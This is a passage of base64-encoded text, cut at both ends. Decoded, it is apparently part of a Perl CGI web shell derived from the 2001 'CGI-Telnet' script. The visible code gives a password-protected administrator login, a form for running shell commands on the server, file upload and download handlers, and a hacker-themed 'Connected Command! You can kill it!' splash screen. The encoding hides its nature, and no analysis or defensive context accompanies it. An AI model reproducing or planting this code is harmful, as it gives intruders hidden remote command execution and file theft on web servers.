leHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFNlcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVz